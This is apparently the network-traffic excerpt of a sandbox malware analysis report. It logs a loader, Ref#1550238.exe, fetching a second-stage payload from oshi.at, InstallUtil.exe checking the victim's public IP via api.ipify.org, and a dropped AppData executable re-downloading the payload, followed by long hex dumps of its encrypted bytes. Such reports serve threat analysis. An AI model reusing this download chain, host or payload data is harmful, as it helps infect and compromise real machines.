                                                                                  Dec 3, 2024 15:16:03.780316114 CET1.1.1.1192.168.2.80x220bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                  Dec 3, 2024 15:16:03.780316114 CET1.1.1.1192.168.2.80x220bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                  • oshi.at
                                                                                  • api.ipify.org
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.849710194.15.112.2484434920C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-03 14:15:45 UTC61OUTGET /EqqP HTTP/1.1
                                                                                  Host: oshi.at
                                                                                  Connection: Keep-Alive
                                                                                  2024-12-03 14:15:46 UTC316INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Tue, 03 Dec 2024 14:15:46 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 997384
                                                                                  Connection: close
                                                                                  ETag: "862892d4964a747c945b938d4d1a2260"
                                                                                  Content-Disposition: attachment; filename=RFmZ.dat
                                                                                  Accept-Ranges: bytes
                                                                                  Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT
                                                                                  2024-12-03 14:15:46 UTC3767INData Raw: f0 26 42 0b 3e ae 98 e4 2d 17 eb 8c df ec 2d d5 dd e1 0b fa 29 d3 5d 0e 65 6e e4 ec b0 a8 40 2a 1b 6f 75 d7 37 ba 1e e0 0c d7 bf 58 bb fd 9b 53 85 57 41 d1 26 c7 eb 31 cf 0d ea 9b 9a 87 aa 0c 90 bd f2 60 6d ca 41 bf 19 96 d0 f4 ef 4a 24 c8 5c 26 69 b3 46 9a d6 d5 d7 cd b8 e6 9e 5e 34 b1 10 8f bb 6d 29 03 21 d2 87 a2 d2 03 13 fa f8 5b db 79 62 77 7c c6 fe ec 0f d1 8e 21 ae bc 87 36 22 56 6a dc d7 0a f5 7e 89 32 0c 1b 92 7e 82 e3 4d 5b 00 6d 0f 9c 78 65 e6 9c 11 e6 a7 ca de 09 0f 33 c5 35 aa c8 79 51 f3 a5 b7 8f 76 e7 8b 3c 40 1d 70 cb d0 b2 0f e4 46 7b e0 08 28 63 00 58 fb 15 f6 26 8d 29 77 9b ec 5d 6b 34 19 e3 dd 58 6e 1b 85 37 b4 13 75 03 a2 f3 b4 1f 6f 4d 43 c6 64 82 4f da 22 62 af 4c f4 46 e6 4c d6 9d 2d d3 0d fa 87 0b 9f 48 df 5b 3c fa b9 2d 7d b4 95
                                                                                  Data Ascii: &B>--)]en@*ou7XSWA&1`mAJ$\&iF^4m)![ybw|!6"Vj~2~M[mxe35yQv<@pF{(cX&)w]k4Xn7uoMCdO"bLFL-H[<-}
                                                                                  2024-12-03 14:15:46 UTC4096INData Raw: 5f aa cd 18 36 19 2c 72 e9 46 53 a2 2e 6f 74 11 41 10 87 2e 4d f4 68 39 85 f5 15 28 d6 58 81 d7 fb 85 b3 3b 30 5b 5d c9 c0 3c 61 a3 ae 14 41 2a ba e9 1b d5 55 a6 b5 5c cc 5b 20 2b a6 45 d6 d1 63 01 b6 a5 a9 02 85 af 18 50 4b 22 5c f6 3f f6 24 73 76 ba 9b d8 04 f2 2b e0 c6 bb 5b 4c 19 9a 83 c3 e6 08 7f 0f 1f 1e b4 76 58 ce e0 9e c2 73 6b e6 ae be e5 e3 83 7a 9a 0d ef de 5e 51 25 e4 5f 9b fd 41 ae f0 84 e4 f6 ff 17 c6 ee 25 09 f1 e5 ca 74 20 b9 83 7a 51 a5 16 0a 48 1a 1b 91 9c b1 7a ab 33 5e a6 7c 95 4b 09 7d 29 1f 5c 5a 0c 1b df 29 64 0d 25 6d 3c 64 ca 52 13 82 49 7a 8e 60 4d 6d c7 07 7f 77 8c c6 87 27 1f eb 19 e0 c8 02 0a 7e ca bb 2f 1a 31 bf 9c 7c 89 2d b0 d2 f5 e0 5f f7 87 3d c4 80 7d 03 78 e2 d2 1a 39 ce 0c e4 45 31 68 29 f9 6d 15 55 6a 4f f5 50 76 e5
                                                                                  Data Ascii: _6,rFS.otA.Mh9(X;0[]<aA*U\[ +EcPK"\?$sv+[LvXskz^Q%_A%t zQHz3^|K})\Z)d%m<dRIz`Mmw'~/1|-_=}x9E1h)mUjOPv
                                                                                  2024-12-03 14:15:46 UTC4096INData Raw: 7c 89 11 5d 3a 09 74 ad 0d 36 ec 77 a0 bd 81 57 36 03 c3 a6 22 e4 a9 e0 f6 38 6a d3 71 51 70 21 a0 00 fe 7c 60 28 98 d9 57 7a e4 09 d4 d2 de 6a 1a cd 82 57 3c 88 df 15 bc fe b3 6c 0a c5 d0 d5 1b 27 19 61 2a b7 36 c4 1b 47 6b e5 ab 35 35 df 41 dd d4 d7 13 8f 9c 59 70 63 d9 67 d2 48 be bf 98 4e ec 45 94 bc c5 17 5b 84 68 15 9b b0 d4 ca 21 78 6a 9f 85 0d a0 45 d4 4c 42 c6 94 75 ce 9f 6d 2c e7 48 e6 2d 50 37 83 5a 79 c8 f1 5a 27 5c 50 97 69 b0 9b d4 e5 34 8f 63 a5 40 ad fa 06 09 e0 4e 74 67 07 c2 d4 3f c6 40 b3 c6 dc 2d 10 a3 08 41 02 06 fc 17 cb df dc ad ef 87 b1 cd b2 8a 28 4a 19 83 78 85 a3 3f e3 b6 55 77 53 c3 39 f4 dc 46 b8 af b5 00 80 ff 0c 2d 29 b0 ce 98 45 2d 11 f7 34 39 72 36 79 84 98 0c 6a ab 9b 6d e3 0d 8b c2 77 22 4d ba 8b f8 a1 61 7b 6b d9 94 2d
                                                                                  Data Ascii: |]:t6wW6"8jqQp!|`(WzjW<l'a*6Gk55AYpcgHNE[h!xjELBum,H-P7ZyZ'\Pi4c@Ntg?@-A(Jx?UwS9F-)E-49r6yjmw"Ma{k-
                                                                                  2024-12-03 14:15:46 UTC4096INData Raw: 3e 5a 7a 03 fd dc cf 82 e2 85 ff 34 e4 c3 e4 81 5d 46 c1 68 2c 55 43 3e 4f 67 5f 3f 1e eb f8 3a cf fb a8 08 1a 87 c2 15 c2 27 5d f3 1e 74 f3 57 5c 7b e6 b5 1e b6 34 98 dc ea 65 6a 02 77 1f bf 9f d6 9d 77 67 cf 04 68 04 e6 0b 44 cc 6c 14 8a c4 31 82 03 1c e0 d5 e6 c1 fe dd 89 24 79 9c bc 38 2c e5 e8 96 90 9d 01 5c 1c 9c 8a 0e 67 6e 96 4a d0 5a 8b 11 0f 17 fe 77 86 19 8e 03 5f c3 f0 ca 20 4f f2 02 33 f5 06 be 8c e7 d1 14 30 8c 2b 67 d8 8d bc 49 f2 77 08 c0 b4 45 17 77 e3 34 8d 02 57 cd ec fd 87 16 f2 88 6d a3 f2 be df af 72 be 01 40 1a ac ac a4 e5 ca 80 e5 9f 5b 77 b7 2a a3 ff 68 d2 ec 68 fd 36 ba 57 80 59 7f 7b d3 75 1b 4f 83 2e 9d a0 32 b6 f9 40 e2 aa cc 5a e0 59 67 ba 97 12 74 32 a2 a2 3e 24 4c 34 5b 7c ac 52 a8 dd f7 31 d9 30 bf 8b 83 de 04 6f 81 12 a5
                                                                                  Data Ascii: >Zz4]Fh,UC>Og_?:']tW\{4ejwwghDl1$y8,\gnJZw_ O30+gIwEw4Wmr@[w*hh6WY{uO.2@ZYgt2>$L4[|R10o
                                                                                  2024-12-03 14:15:46 UTC4096INData Raw: 87 40 62 be c1 78 bf 73 be 26 41 b8 20 31 d4 0f 94 63 26 d9 c8 6a 3d 36 84 ad dd 60 84 4e 2c f7 63 c0 65 66 9a 8d 7c d9 ea c0 15 d4 18 f7 22 90 0e 16 e0 e1 a2 79 dd 35 2e 25 e9 26 3c 35 19 fb 08 09 65 30 5a 92 3a f1 3f dd 17 85 f4 87 98 81 66 e0 48 9b a0 bb 86 9b b5 fd a6 6f 5f c2 ee cc c4 3a 3b e6 a4 9b 12 ec 8b 46 4e 95 16 f6 36 ef e0 5e d7 06 0f ba 2b bc b6 98 f0 d5 ea 70 c3 e8 b6 0d ec a2 27 bf 47 0b 09 24 0d b7 76 3a fd fa 35 01 14 4c b4 12 34 b4 91 3b 68 68 ef 90 fd 3d 56 4c bd 20 44 7f 76 09 fe fc 39 29 67 54 77 90 09 df c8 ce 55 0f 34 77 e3 aa 75 45 49 36 4e 1b 47 7f 96 ae 0c 4d e8 69 fd 21 9c 7c f8 6d 9e 75 d1 cb 2b 68 c6 73 a0 40 66 4d 51 52 79 57 4c d2 8d 4c d3 43 49 47 a1 e4 28 55 18 6a 8e 50 92 75 3f 25 fe 99 58 dd 85 9f d9 71 db a4 0c 32 aa
                                                                                  Data Ascii: @bxs&A 1c&j=6`N,cef|"y5.%&<5e0Z:?fHo_:;FN6^+p'G$v:5L4;hh=VL Dv9)gTwU4wuEI6NGMi!|mu+hs@fMQRyWLLCIG(UjPu?%Xq2
                                                                                  2024-12-03 14:15:47 UTC4096INData Raw: 1b 67 24 be 04 66 7b b4 13 b2 03 66 41 b4 8c cb 49 25 8c cc 52 96 5a 00 da d2 e0 dd 43 0a 82 d2 7a 4d 3a 2a e9 98 bc 1c 3c 5b de ff 87 85 cc d7 11 09 cc ca 94 d2 5b 50 7b b6 77 84 23 32 05 fd 85 81 98 ff 13 b9 4a bd c8 e9 f4 42 ac 00 c0 fc 42 9d c0 ef f0 f9 6b 11 0f f4 d2 25 18 03 6b 5b 1f 9f e6 a6 20 94 1c 9c fe 23 5d 6c b9 21 e0 b9 f7 22 d7 53 f4 64 02 6b 62 5b a8 e5 99 46 f5 81 88 6f f7 c0 31 68 c5 6f 32 5d 74 f0 5e 1f 8a 8d b8 85 66 a6 66 c5 f7 2b 88 64 69 6b 9f 32 8b ac b3 ff 08 88 4a ce f1 61 a2 a2 a7 86 51 b2 27 0b e0 af 21 c6 c2 58 d5 b5 7d 1a 45 21 fa 04 c2 ef cc 69 af ea 7f 5c ea 79 ed 34 c2 e9 5c 53 ed 3c d6 13 94 b1 2b 17 8b a0 90 7a 95 e3 a1 1c 2a a3 c4 a9 9d 05 e8 cc 17 a5 93 84 8d 91 25 06 fb ff 5a 9b 05 d3 fd 49 4f 9e 18 02 73 da e5 c5 97
                                                                                  Data Ascii: g$f{fAI%RZCzM:*<[[P{w#2JBBk%k[ #]l!"Sdkb[Fo1ho2]t^ff+dik2JaQ'!X}E!i\y4\S<+z*%ZIOs
                                                                                  2024-12-03 14:15:47 UTC846INData Raw: e9 1e a3 e4 5f 4f 98 43 7b 31 54 67 7a b5 51 57 b4 ad 5f 96 8c 31 b9 2a 3f 2e 69 c1 1c 13 3d 37 9e 2b 7f eb 31 75 ac aa 12 f0 86 22 e9 da 92 8d 2b 1e 10 9b 38 a3 be c0 ec 7c 29 5d 2b 8b 7e ef e6 a2 9e 7c f1 e6 9b 55 23 e6 56 b2 01 52 c1 f5 61 92 69 5f b3 ad c7 91 c9 b9 ba fa 01 67 11 cd b7 f7 c6 6e d1 dd 99 38 80 58 5e 2a 4f 30 48 76 27 e6 1a a5 03 ac c3 a7 4a 9b 66 43 cc 3e 03 5f e3 3f a6 27 39 0d 09 fa 30 8b d5 0b 4b 84 b7 26 ff e0 77 f5 fe f1 84 ed 8e 25 de 46 7b 22 58 a9 f6 79 60 c3 a7 ad de 12 db 8b ea 44 97 29 d4 10 69 47 00 3c fc 25 14 85 25 62 8a 5f a3 6d ab 8b 0d 8f 46 2e 37 76 fd b5 a7 4a b8 c0 45 b8 8c 16 a4 3d cd af d9 48 60 28 97 b6 1f 11 4e bb f1 dd 0c 1e 08 dd 71 04 46 a9 dc f1 52 68 33 a9 8e 8f 59 69 d9 c4 73 cf b3 a3 1b db ba 0a 84 6c 5d
                                                                                  Data Ascii: _OC{1TgzQW_1*?.i=7+1u"+8|)]+~|U#VRai_gn8X^*O0Hv'JfC>_?'90K&w%F{"Xy`D)iG<%%b_mF.7vJE=H`(NqFRh3Yisl]
                                                                                  2024-12-03 14:15:47 UTC4096INData Raw: 12 0f 34 e3 63 89 01 ff 43 0e 8a 7f fb fb ea 11 94 2a 4c 2a 16 4d 90 ec 69 1c 95 05 71 40 42 75 c6 72 af db 43 bd 4e dd 04 f4 55 b0 9b 10 ad 71 23 3a c7 31 a9 86 51 57 16 90 d5 a2 f5 d5 e4 f8 ee 9a 2c 59 94 a2 5b 01 3f 96 79 10 79 cf 14 4c a2 b1 58 a6 cb 53 34 f0 c0 91 53 04 64 3c bd b2 8c e9 f9 a4 be 93 03 12 11 e3 1e 4f 4d e9 88 e9 1a 09 21 bc c5 d8 5a c9 a8 99 ad 14 e2 2f 01 99 5f 13 1f 7c d0 8b bc 99 33 de 02 cf 4a 1d e4 09 93 6b b1 f4 51 c3 c8 68 b1 41 98 7d 46 ef d0 64 8a 39 8c 70 22 00 af 2e 94 a9 e5 5c ba 4d e5 61 f9 41 08 f7 09 99 30 67 c8 4f cb b3 6e 33 69 64 a3 c7 26 97 1a 84 20 8a ff 9d 09 13 8b 3a 37 b5 87 f7 f7 ab 96 df 39 72 c4 ac 5c 9e 55 aa a2 37 60 7b e7 2a 9c a8 34 c5 16 e5 e5 45 c4 3e b4 fb 96 6d 71 8a 4b 69 4c 22 37 fc ab 52 08 51 a6
                                                                                  Data Ascii: 4cC*L*Miq@BurCNUq#:1QW,Y[?yyLXS4Sd<OM!Z/_|3JkQhA}Fd9p".\MaA0gOn3id& :79r\U7`{*4E>mqKiL"7RQ
                                                                                  2024-12-03 14:15:47 UTC4096INData Raw: 59 52 b0 68 eb 14 38 79 b9 a2 aa 99 35 77 c2 60 3c ab 7e 70 3d d4 08 be 3c c7 ab d0 7f a5 bd 59 6c d9 ce ef c8 64 fa 1f 87 7f 89 a2 d5 61 ae 16 b8 6f 9d 29 71 5e 4a 63 3a c4 85 26 38 7c c8 10 7e 48 b7 c6 d9 2b ee eb 62 38 cd 86 21 0a c0 32 10 08 4b 63 16 30 81 3d ce ab d0 bb c7 a2 16 1d bc 26 9d f2 cd dd e1 49 07 80 1a 1c 5b 1d 16 8a d6 12 b5 79 49 53 bf bf 32 b0 93 bd ff cf e8 ae 1e 4d 7e 86 a1 ce fc 16 c7 22 1f b9 97 d1 d6 85 0f fd 98 c1 02 94 5d e7 d7 ce cf d4 a5 85 fe 1e be 42 05 f8 69 02 b7 bc b5 a9 15 3d 12 b3 04 c7 f1 23 79 fb b2 ee b8 89 d6 20 86 57 33 be 54 c5 d5 34 6c 30 da b8 40 98 17 51 ae 41 a4 b7 00 c9 72 b0 d8 57 e3 65 90 36 5f 9f 32 0b ed b1 38 96 ee 16 67 cd e5 a7 85 ed 52 12 1a 07 0c 77 0c 99 37 54 6c 03 14 94 8d b9 6a ac 5c 9d 3a 87 01
                                                                                  Data Ascii: YRh8y5w`<~p=<Yldao)q^Jc:&8|~H+b8!2Kc0=&I[yIS2M~"]Bi=#y W3T4l0@QArWe6_28gRw7Tlj\:
                                                                                  2024-12-03 14:15:47 UTC4096INData Raw: ed f3 34 95 32 5f 31 db 06 10 fa 15 ae a4 96 1e 5d 94 bc 77 ab 9f 6b 21 4d 4b 59 8e 74 8d 94 53 7e 65 0e 3c 30 0c 0a 67 f6 19 65 ff 51 17 c1 97 b5 f4 5d a4 20 e2 5b a4 ad 61 92 4e 43 45 73 04 35 57 ba b7 13 64 61 d9 46 c7 d2 71 07 70 54 b5 ca 69 82 38 70 7f 13 d0 8b 6c ec ee 39 81 46 4c d3 a7 60 de 7f 71 07 0b 10 11 05 2a 14 a9 3f cd d9 fc 29 eb 64 8a 18 fc 68 ae 7e 9d 1b da 82 14 cf 45 a2 ba f3 0c a1 2f c4 57 ed c4 b3 93 7c 59 87 2e 2f c7 c7 c3 8c a4 35 bc ed 63 43 38 5e 2f d5 b4 ed 4d f5 08 e6 72 74 fe a4 22 83 df c2 f4 61 f6 06 f8 4d b8 8c 26 1b 6a 5a 3d c6 3d 55 f4 b5 52 cb 45 e0 bd a4 45 e6 42 7f 5b d5 dc b2 66 10 68 f7 7b 16 c4 d7 d0 ee 6b 30 0e 44 11 e5 96 f9 cb 2e 21 12 81 1d e6 eb d5 7a 8d 77 a0 68 56 af 29 12 88 4c d0 77 aa c6 5b 9a ad 51 5c fb
                                                                                  Data Ascii: 42_1]wk!MKYtS~e<0geQ] [aNCEs5WdaFqpTi8pl9FL`q*?)dh~E/W|Y./5cC8^/Mrt"aM&jZ==UREEB[fh{k0D.!zwhV)Lw[Q\


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.849712104.26.13.2054435520C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-03 14:16:05 UTC155OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-12-03 14:16:05 UTC424INHTTP/1.1 200 OK
                                                                                  Date: Tue, 03 Dec 2024 14:16:05 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 12
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ec42c295f674411-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1780487&cwnd=231&unsent_bytes=0&cid=c6bb677c24ed1e40&ts=469&x=0"
                                                                                  2024-12-03 14:16:05 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                  Data Ascii: 8.46.123.228


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.849714194.15.112.2484436740C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-03 14:16:17 UTC61OUTGET /EqqP HTTP/1.1
                                                                                  Host: oshi.at
                                                                                  Connection: Keep-Alive
                                                                                  2024-12-03 14:16:18 UTC316INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Tue, 03 Dec 2024 14:16:18 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 997384
                                                                                  Connection: close
                                                                                  ETag: "862892d4964a747c945b938d4d1a2260"
                                                                                  Content-Disposition: attachment; filename=RFmZ.dat
                                                                                  Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  2024-12-03 14:16:18 UTC3767INData Raw: f0 26 42 0b 3e ae 98 e4 2d 17 eb 8c df ec 2d d5 dd e1 0b fa 29 d3 5d 0e 65 6e e4 ec b0 a8 40 2a 1b 6f 75 d7 37 ba 1e e0 0c d7 bf 58 bb fd 9b 53 85 57 41 d1 26 c7 eb 31 cf 0d ea 9b 9a 87 aa 0c 90 bd f2 60 6d ca 41 bf 19 96 d0 f4 ef 4a 24 c8 5c 26 69 b3 46 9a d6 d5 d7 cd b8 e6 9e 5e 34 b1 10 8f bb 6d 29 03 21 d2 87 a2 d2 03 13 fa f8 5b db 79 62 77 7c c6 fe ec 0f d1 8e 21 ae bc 87 36 22 56 6a dc d7 0a f5 7e 89 32 0c 1b 92 7e 82 e3 4d 5b 00 6d 0f 9c 78 65 e6 9c 11 e6 a7 ca de 09 0f 33 c5 35 aa c8 79 51 f3 a5 b7 8f 76 e7 8b 3c 40 1d 70 cb d0 b2 0f e4 46 7b e0 08 28 63 00 58 fb 15 f6 26 8d 29 77 9b ec 5d 6b 34 19 e3 dd 58 6e 1b 85 37 b4 13 75 03 a2 f3 b4 1f 6f 4d 43 c6 64 82 4f da 22 62 af 4c f4 46 e6 4c d6 9d 2d d3 0d fa 87 0b 9f 48 df 5b 3c fa b9 2d 7d b4 95
                                                                                  Data Ascii: &B>--)]en@*ou7XSWA&1`mAJ$\&iF^4m)![ybw|!6"Vj~2~M[mxe35yQv<@pF{(cX&)w]k4Xn7uoMCdO"bLFL-H[<-}
                                                                                  2024-12-03 14:16:18 UTC4096INData Raw: 5f aa cd 18 36 19 2c 72 e9 46 53 a2 2e 6f 74 11 41 10 87 2e 4d f4 68 39 85 f5 15 28 d6 58 81 d7 fb 85 b3 3b 30 5b 5d c9 c0 3c 61 a3 ae 14 41 2a ba e9 1b d5 55 a6 b5 5c cc 5b 20 2b a6 45 d6 d1 63 01 b6 a5 a9 02 85 af 18 50 4b 22 5c f6 3f f6 24 73 76 ba 9b d8 04 f2 2b e0 c6 bb 5b 4c 19 9a 83 c3 e6 08 7f 0f 1f 1e b4 76 58 ce e0 9e c2 73 6b e6 ae be e5 e3 83 7a 9a 0d ef de 5e 51 25 e4 5f 9b fd 41 ae f0 84 e4 f6 ff 17 c6 ee 25 09 f1 e5 ca 74 20 b9 83 7a 51 a5 16 0a 48 1a 1b 91 9c b1 7a ab 33 5e a6 7c 95 4b 09 7d 29 1f 5c 5a 0c 1b df 29 64 0d 25 6d 3c 64 ca 52 13 82 49 7a 8e 60 4d 6d c7 07 7f 77 8c c6 87 27 1f eb 19 e0 c8 02 0a 7e ca bb 2f 1a 31 bf 9c 7c 89 2d b0 d2 f5 e0 5f f7 87 3d c4 80 7d 03 78 e2 d2 1a 39 ce 0c e4 45 31 68 29 f9 6d 15 55 6a 4f f5 50 76 e5
                                                                                  Data Ascii: _6,rFS.otA.Mh9(X;0[]<aA*U\[ +EcPK"\?$sv+[LvXskz^Q%_A%t zQHz3^|K})\Z)d%m<dRIz`Mmw'~/1|-_=}x9E1h)mUjOPv
                                                                                  2024-12-03 14:16:18 UTC4096INData Raw: 7c 89 11 5d 3a 09 74 ad 0d 36 ec 77 a0 bd 81 57 36 03 c3 a6 22 e4 a9 e0 f6 38 6a d3 71 51 70 21 a0 00 fe 7c 60 28 98 d9 57 7a e4 09 d4 d2 de 6a 1a cd 82 57 3c 88 df 15 bc fe b3 6c 0a c5 d0 d5 1b 27 19 61 2a b7 36 c4 1b 47 6b e5 ab 35 35 df 41 dd d4 d7 13 8f 9c 59 70 63 d9 67 d2 48 be bf 98 4e ec 45 94 bc c5 17 5b 84 68 15 9b b0 d4 ca 21 78 6a 9f 85 0d a0 45 d4 4c 42 c6 94 75 ce 9f 6d 2c e7 48 e6 2d 50 37 83 5a 79 c8 f1 5a 27 5c 50 97 69 b0 9b d4 e5 34 8f 63 a5 40 ad fa 06 09 e0 4e 74 67 07 c2 d4 3f c6 40 b3 c6 dc 2d 10 a3 08 41 02 06 fc 17 cb df dc ad ef 87 b1 cd b2 8a 28 4a 19 83 78 85 a3 3f e3 b6 55 77 53 c3 39 f4 dc 46 b8 af b5 00 80 ff 0c 2d 29 b0 ce 98 45 2d 11 f7 34 39 72 36 79 84 98 0c 6a ab 9b 6d e3 0d 8b c2 77 22 4d ba 8b f8 a1 61 7b 6b d9 94 2d
                                                                                  Data Ascii: |]:t6wW6"8jqQp!|`(WzjW<l'a*6Gk55AYpcgHNE[h!xjELBum,H-P7ZyZ'\Pi4c@Ntg?@-A(Jx?UwS9F-)E-49r6yjmw"Ma{k-
                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: 3e 5a 7a 03 fd dc cf 82 e2 85 ff 34 e4 c3 e4 81 5d 46 c1 68 2c 55 43 3e 4f 67 5f 3f 1e eb f8 3a cf fb a8 08 1a 87 c2 15 c2 27 5d f3 1e 74 f3 57 5c 7b e6 b5 1e b6 34 98 dc ea 65 6a 02 77 1f bf 9f d6 9d 77 67 cf 04 68 04 e6 0b 44 cc 6c 14 8a c4 31 82 03 1c e0 d5 e6 c1 fe dd 89 24 79 9c bc 38 2c e5 e8 96 90 9d 01 5c 1c 9c 8a 0e 67 6e 96 4a d0 5a 8b 11 0f 17 fe 77 86 19 8e 03 5f c3 f0 ca 20 4f f2 02 33 f5 06 be 8c e7 d1 14 30 8c 2b 67 d8 8d bc 49 f2 77 08 c0 b4 45 17 77 e3 34 8d 02 57 cd ec fd 87 16 f2 88 6d a3 f2 be df af 72 be 01 40 1a ac ac a4 e5 ca 80 e5 9f 5b 77 b7 2a a3 ff 68 d2 ec 68 fd 36 ba 57 80 59 7f 7b d3 75 1b 4f 83 2e 9d a0 32 b6 f9 40 e2 aa cc 5a e0 59 67 ba 97 12 74 32 a2 a2 3e 24 4c 34 5b 7c ac 52 a8 dd f7 31 d9 30 bf 8b 83 de 04 6f 81 12 a5
                                                                                  Data Ascii: >Zz4]Fh,UC>Og_?:']tW\{4ejwwghDl1$y8,\gnJZw_ O30+gIwEw4Wmr@[w*hh6WY{uO.2@ZYgt2>$L4[|R10o
                                                                                  2024-12-03 14:16:19 UTC2353INData Raw: 87 40 62 be c1 78 bf 73 be 26 41 b8 20 31 d4 0f 94 63 26 d9 c8 6a 3d 36 84 ad dd 60 84 4e 2c f7 63 c0 65 66 9a 8d 7c d9 ea c0 15 d4 18 f7 22 90 0e 16 e0 e1 a2 79 dd 35 2e 25 e9 26 3c 35 19 fb 08 09 65 30 5a 92 3a f1 3f dd 17 85 f4 87 98 81 66 e0 48 9b a0 bb 86 9b b5 fd a6 6f 5f c2 ee cc c4 3a 3b e6 a4 9b 12 ec 8b 46 4e 95 16 f6 36 ef e0 5e d7 06 0f ba 2b bc b6 98 f0 d5 ea 70 c3 e8 b6 0d ec a2 27 bf 47 0b 09 24 0d b7 76 3a fd fa 35 01 14 4c b4 12 34 b4 91 3b 68 68 ef 90 fd 3d 56 4c bd 20 44 7f 76 09 fe fc 39 29 67 54 77 90 09 df c8 ce 55 0f 34 77 e3 aa 75 45 49 36 4e 1b 47 7f 96 ae 0c 4d e8 69 fd 21 9c 7c f8 6d 9e 75 d1 cb 2b 68 c6 73 a0 40 66 4d 51 52 79 57 4c d2 8d 4c d3 43 49 47 a1 e4 28 55 18 6a 8e 50 92 75 3f 25 fe 99 58 dd 85 9f d9 71 db a4 0c 32 aa
                                                                                  Data Ascii: @bxs&A 1c&j=6`N,cef|"y5.%&<5e0Z:?fHo_:;FN6^+p'G$v:5L4;hh=VL Dv9)gTwU4wuEI6NGMi!|mu+hs@fMQRyWLLCIG(UjPu?%Xq2
                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: e8 1d e4 ca 19 74 b2 0d 5e cf 20 bd 03 69 3e c4 14 11 5d f0 27 0f 68 1d 6e 71 ea 6e 9a 61 be 61 d4 d9 f1 08 a5 f1 88 f2 c0 ab f9 1a 77 97 d1 86 2e a8 d8 11 45 1c 3c 10 72 58 a2 cd 7b 0d bb 44 9d d5 ce 26 81 5c d5 f8 bf fc 11 bd 56 9e cd e5 71 b8 1b ba 47 78 44 6c bc 92 a2 51 a2 78 ff b6 cd 57 4c 99 e7 4c 92 e6 3a 01 ac ce 6d 99 fa b1 84 15 5f 5b 8a 86 b9 0c 23 44 fc 5e 50 11 5b e2 09 24 8c ca 43 a5 d5 35 f0 5d 34 fc e9 0a f1 fa b4 a7 72 8e 32 09 c8 84 74 4b 43 cc 80 b1 49 9b 37 fb 1f f9 22 74 a9 34 56 cf 52 1d 5a e8 19 78 36 a7 64 fe da e2 88 71 18 b7 62 88 57 d4 e3 72 9d 77 95 02 54 9e 41 d1 29 4a d8 80 fd f0 c5 e6 a5 05 9e 1a 25 11 7c 3f 35 cd 98 09 b6 e3 58 51 4e aa e8 a0 7c 7e 84 98 39 0b 5f bb a7 eb d4 dd c8 ed 58 06 4a a3 47 99 7c 3e 50 9d 4c b1 56
                                                                                  Data Ascii: t^ i>]'hnqnaaw.E<rX{D&\VqGxDlQxWLL:m_[#D^P[$C5]4r2tKCI7"t4VRZx6dqbWrwTA)J%|?5XQN|~9_XJG|>PLV
                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: a4 93 f3 97 ce 7f 4d 6a 9a 5a 19 c8 8f 1b d7 e1 e5 a4 22 ca eb 49 4f c1 e7 66 ed a6 00 2a d2 ae 19 85 4f f8 29 27 a6 e4 2b 1b a4 75 9d 17 bc 3a 93 51 05 9a 15 12 b7 8d 5f 26 f5 fc 30 90 54 23 c5 7c cb 52 47 4b 39 fb 89 d5 86 b7 22 46 39 e3 7a 14 ec 81 af f2 d7 e0 c5 87 5c 63 82 ae 32 8d 0c 57 39 d0 af de 3c 5c 74 5b ae 15 f6 cb 4e 7c 88 fa 08 6b c6 1e 15 7d 73 9a bb 51 df 53 af 1a 16 ac c3 65 c2 f4 8b e2 db 3e 92 d1 e9 76 c4 f0 94 4d 28 2b 38 66 32 8e ac b2 97 99 15 d0 60 db 99 0d ad cb 4d cf 2d 74 fe 75 be 50 b7 ef be 8b 39 80 5f da 49 87 50 b7 8f 05 1e 65 a4 6b 79 8d 9c 26 41 69 c6 ff 07 dc 7d 38 53 6b ad 49 4d bb 68 fe c8 3b c5 cc 51 7a f5 69 97 6f 84 03 91 f5 fe fa 77 2a e9 b2 31 a1 d7 ff 25 54 ac 8e 00 c5 64 2c 14 7f e2 cc 2a ee 2c 31 ed 6c 7e 6a 60
                                                                                  Data Ascii: MjZ"IOf*O)'+u:Q_&0T#|RGK9"F9z\c2W9<\t[N|k}sQSe>vM(+8f2`M-tuP9_IPeky&Ai}8SkIMh;Qziow*1%Td,*,1l~j`
